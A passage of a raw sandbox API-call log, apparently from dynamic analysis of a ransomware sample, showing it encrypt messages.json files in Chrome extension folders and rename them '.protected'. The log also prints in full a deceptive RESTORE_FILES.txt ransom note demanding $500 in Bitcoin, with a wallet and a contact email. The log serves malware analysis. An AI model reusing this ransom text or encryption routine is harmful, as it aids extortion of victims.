[0080.167] WriteFile (in: hFile=0x164, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295d914*=0x53d, lpOverlapped=0x0) returned 1 [0080.168] lstrlenA (lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0080.168] WriteFile (in: hFile=0x164, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295d914*=0x2ac, lpOverlapped=0x0) returned 1 [0080.168] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0080.168] WriteFile (in: hFile=0x164, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295d914*=0xb1, lpOverlapped=0x0) returned 1 [0080.168] CloseHandle (hObject=0x164) returned 1 [0080.168] FindNextFileW (in: hFindFile=0x47bbd0, lpFindFileData=0x295dba0 | out: lpFindFileData=0x295dba0) returned 1 [0080.168] lstrcmpiW (lpString1="sl", lpString2="Windows") returned -1 [0080.168] lstrcmpiW (lpString1="sl", lpString2="Program Files") returned 1 [0080.168] lstrcmpiW (lpString1="sl", lpString2="Program Files (x86)") returned 1 [0080.168] lstrcmpiW (lpString1="sl", lpString2="$Recycle.bin") returned 1 [0080.168] lstrcmpiW (lpString1="sl", lpString2="System Volume Information") returned -1 [0080.168] wnsprintfW (in: pszDest=0xcf1098, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\sl") returned 141 [0080.168] lstrcmpW (lpString1="sl", lpString2=".") returned 1 [0080.168] lstrcmpW (lpString1="sl", lpString2="..") returned 1 [0080.168] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\sl\\*") returned 143 [0080.168] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\sl\\*", lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0x47bc10 [0080.168] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0080.168] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0080.168] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0080.169] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0080.169] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0080.169] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\sl\\.") returned 143 [0080.169] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0080.169] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0080.169] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0080.169] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0080.169] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0080.169] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0080.169] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0080.169] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\sl\\..") returned 144 [0080.169] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0080.169] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0080.169] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0080.169] lstrcmpiW (lpString1="messages.json", lpString2="Windows") returned -1 [0080.169] lstrcmpiW (lpString1="messages.json", lpString2="Program Files") returned -1 [0080.169] lstrcmpiW (lpString1="messages.json", lpString2="Program Files (x86)") returned -1 [0080.169] lstrcmpiW (lpString1="messages.json", lpString2="$Recycle.bin") returned 1 [0080.169] lstrcmpiW (lpString1="messages.json", lpString2="System Volume Information") returned -1 [0080.169] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\sl\\messages.json") returned 155 [0080.169] StrStrIW (lpFirst="messages.json", lpSrch=".protected") returned 0x0 [0080.169] lstrcmpW (lpString1="messages.json", lpString2="RESTORE_FILES.txt") returned -1 [0080.169] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295d8cc | out: pbBuffer=0x295d8cc) returned 1 [0080.169] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x30) returned 1 [0080.169] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\sl\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\sl\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x168 [0080.169] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\sl\\messages.json") returned 155 [0080.169] StrStrW (lpFirst="messages.json", lpSrch=".txt") returned 0x0 [0080.169] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\sl\\messages.json") returned 155 [0080.169] StrStrW (lpFirst="messages.json", lpSrch=".rar") returned 0x0 [0080.169] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\sl\\messages.json") returned 155 [0080.169] StrStrW (lpFirst="messages.json", lpSrch=".zip") returned 0x0 [0080.169] ReadFile (in: hFile=0x168, lpBuffer=0xd11128, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesRead=0x295d914*=0xde, lpOverlapped=0x0) returned 1 [0080.170] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0xffffff22, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0080.170] WriteFile (in: hFile=0x168, lpBuffer=0xd11128*, nNumberOfBytesToWrite=0xde, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesWritten=0x295d914*=0xde, lpOverlapped=0x0) returned 1 [0080.170] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0080.170] WriteFile (in: hFile=0x168, lpBuffer=0x295d8ec*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x295d8ec*, lpNumberOfBytesWritten=0x295d914*=0x4, lpOverlapped=0x0) returned 1 [0080.170] WriteFile (in: hFile=0x168, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295d914*=0x30, lpOverlapped=0x0) returned 1 [0080.171] CloseHandle (hObject=0x168) returned 1 [0080.171] wnsprintfW (in: pszDest=0xd11128, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\sl\\messages.json.protected") returned 165 [0080.171] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\sl\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\sl\\messages.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\sl\\messages.json.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\sl\\messages.json.protected")) returned 1 [0080.171] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0 [0080.171] FindClose (in: hFindFile=0x47bc10 | out: hFindFile=0x47bc10) returned 1 [0080.171] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\sl\\RESTORE_FILES.txt") returned 159 [0080.171] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\sl\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\sl\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x164 [0080.172] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0080.172] WriteFile (in: hFile=0x164, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295d914*=0x53d, lpOverlapped=0x0) returned 1 [0080.172] lstrlenA (lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0080.172] WriteFile (in: hFile=0x164, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295d914*=0x2ac, lpOverlapped=0x0) returned 1 [0080.172] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0080.172] WriteFile (in: hFile=0x164, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295d914*=0xb1, lpOverlapped=0x0) returned 1 [0080.172] CloseHandle (hObject=0x164) returned 1 [0080.173] FindNextFileW (in: hFindFile=0x47bbd0, lpFindFileData=0x295dba0 | out: lpFindFileData=0x295dba0) returned 1 [0080.173] lstrcmpiW (lpString1="sr", lpString2="Windows") returned -1 [0080.173] lstrcmpiW (lpString1="sr", lpString2="Program Files") returned 1 [0080.173] lstrcmpiW (lpString1="sr", lpString2="Program Files (x86)") returned 1 [0080.173] lstrcmpiW (lpString1="sr", lpString2="$Recycle.bin") returned 1 [0080.173] lstrcmpiW (lpString1="sr", lpString2="System Volume Information") returned -1 [0080.173] wnsprintfW (in: pszDest=0xcf1098, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\sr") returned 141 [0080.173] lstrcmpW (lpString1="sr", lpString2=".") returned 1 [0080.173] lstrcmpW (lpString1="sr", lpString2="..") returned 1 [0080.173] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\sr\\*") returned 143 [0080.173] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\sr\\*", lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0x47bc10 [0080.173] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0080.173] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0080.173] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0080.173] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0080.173] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0080.173] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\sr\\.") returned 143 [0080.173] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0080.173] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0080.173] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0080.173] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0080.173] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0080.173] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0080.173] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0080.173] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\sr\\..") returned 144 [0080.173] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0080.173] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0080.173] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0080.173] lstrcmpiW (lpString1="messages.json", lpString2="Windows") returned -1 [0080.173] lstrcmpiW (lpString1="messages.json", lpString2="Program Files") returned -1 [0080.173] lstrcmpiW (lpString1="messages.json", lpString2="Program Files (x86)") returned -1 [0080.173] lstrcmpiW (lpString1="messages.json", lpString2="$Recycle.bin") returned 1 [0080.173] lstrcmpiW (lpString1="messages.json", lpString2="System Volume Information") returned -1 [0080.173] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\sr\\messages.json") returned 155 [0080.173] StrStrIW (lpFirst="messages.json", lpSrch=".protected") returned 0x0 [0080.173] lstrcmpW (lpString1="messages.json", lpString2="RESTORE_FILES.txt") returned -1 [0080.173] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295d8cc | out: pbBuffer=0x295d8cc) returned 1 [0080.174] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x30) returned 1 [0080.174] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\sr\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\sr\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x168 [0080.174] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\sr\\messages.json") returned 155 [0080.174] StrStrW (lpFirst="messages.json", lpSrch=".txt") returned 0x0 [0080.174] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\sr\\messages.json") returned 155 [0080.174] StrStrW (lpFirst="messages.json", lpSrch=".rar") returned 0x0 [0080.174] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\sr\\messages.json") returned 155 [0080.174] StrStrW (lpFirst="messages.json", lpSrch=".zip") returned 0x0 [0080.175] ReadFile (in: hFile=0x168, lpBuffer=0xd11128, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesRead=0x295d914*=0xec, lpOverlapped=0x0) returned 1 [0080.175] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0xffffff14, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0080.175] WriteFile (in: hFile=0x168, lpBuffer=0xd11128*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesWritten=0x295d914*=0xec, lpOverlapped=0x0) returned 1 [0080.175] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0080.175] WriteFile (in: hFile=0x168, lpBuffer=0x295d8ec*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x295d8ec*, lpNumberOfBytesWritten=0x295d914*=0x4, lpOverlapped=0x0) returned 1 [0080.176] WriteFile (in: hFile=0x168, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295d914*=0x30, lpOverlapped=0x0) returned 1 [0080.176] CloseHandle (hObject=0x168) returned 1 [0080.176] wnsprintfW (in: pszDest=0xd11128, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\sr\\messages.json.protected") returned 165 [0080.176] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\sr\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\sr\\messages.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\sr\\messages.json.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\sr\\messages.json.protected")) returned 1 [0080.176] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0 [0080.176] FindClose (in: hFindFile=0x47bc10 | out: hFindFile=0x47bc10) returned 1 [0080.176] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\sr\\RESTORE_FILES.txt") returned 159 [0080.176] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\sr\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\sr\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x164 [0080.177] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0080.177] WriteFile (in: hFile=0x164, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295d914*=0x53d, lpOverlapped=0x0) returned 1 [0080.177] lstrlenA 